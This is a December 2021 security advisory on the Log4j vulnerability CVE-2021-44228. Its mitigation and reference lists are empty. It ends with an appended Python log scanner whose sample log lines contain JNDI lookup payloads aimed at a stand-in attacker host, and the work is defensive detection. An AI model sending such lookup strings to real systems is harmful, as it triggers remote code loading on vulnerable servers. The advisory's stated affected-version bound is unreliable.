BY Ray Stevens / ON Dec 10, 2021
We are writing to inform our readers of a new high-profile zero-day vulnerability affecting a large number of Java applications through a vulnerable version of the widely used logging library Apache Log4j.
This is a critical severity issue which can allow a remote attacker to execute arbitrary code in the context of any affected application.
This vulnerability has been designated the identifier CVE-2021-44228 and affects applications using versions of Apache Log4j < 2.14.1-rc2.
We are writing to inform our clients of this issue immediately due to the high-impact nature of the exploit, the wide use of the underlying vulnerable library within codebases, and the fact that it is believed to be already under active exploitation by malicious individuals through a publicly available exploit.
To mitigate this issue:
For further information, please see the following references:
Additionally, to determine if your servers have already seen exploitation attempts, please refer to your application log files (e.g. /var/logs or wherever applicable) and search for the presence of the string " ${jndi:ldap://".
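A small log scanner for the indicator named above, added here as an example and not part of the original post. It applies the check to a few constructed log lines; the regex broadens the post's literal "${jndi:ldap://" to any "${jndi:" prefix, case-insensitive and scheme-agnostic (an assumption going beyond the post's string), and the host names and addresses in the sample are made up.

```python
import re
from typing import List, Tuple

# Constructed sample access-log lines (not from the original post). Lines 1
# and 3 carry the lookup string in the User-Agent and query string; line 2 is
# ordinary traffic and line 4 is a near-miss that mentions "jndi" and "ldap"
# without the ${...} lookup syntax.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2021:12:01:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"
10.0.0.7 - - [10/Dec/2021:12:01:09 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Dec/2021:12:02:44 +0000] "GET /?q=${JNDI:LDAPS://attacker.example/b} HTTP/1.1" 404 0 "-" "curl/7.79"
10.0.0.11 - - [10/Dec/2021:12:03:00 +0000] "GET /docs/jndi-ldap-tutorial HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# The post's indicator is the literal "${jndi:ldap://". Log4j resolves the
# lookup prefix case-insensitively, and the same syntax works with other
# schemes (ldaps, rmi, dns), so the pattern matches the "${jndi:" prefix
# regardless of case and leaves the scheme open.
JNDI_LOOKUP = re.compile(r"\$\{jndi:", re.IGNORECASE)


def find_jndi_lookups(log_text: str) -> List[Tuple[int, str]]:
    """Return (1-based line number, line) for each line containing a JNDI lookup string."""
    hits: List[Tuple[int, str]] = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        if JNDI_LOOKUP.search(line):
            hits.append((lineno, line))
    return hits


def scan_file(path: str) -> List[Tuple[int, str]]:
    """Run the same check over a log file on disk; errors='replace' tolerates non-UTF-8 bytes."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return find_jndi_lookups(fh.read())


if __name__ == "__main__":
    for lineno, line in find_jndi_lookups(SAMPLE_LOG):
        print(f"line {lineno}: {line}")
```

A literal match like this only finds unobfuscated lookup strings, so an empty result is a first pass rather than proof that no attempt was made.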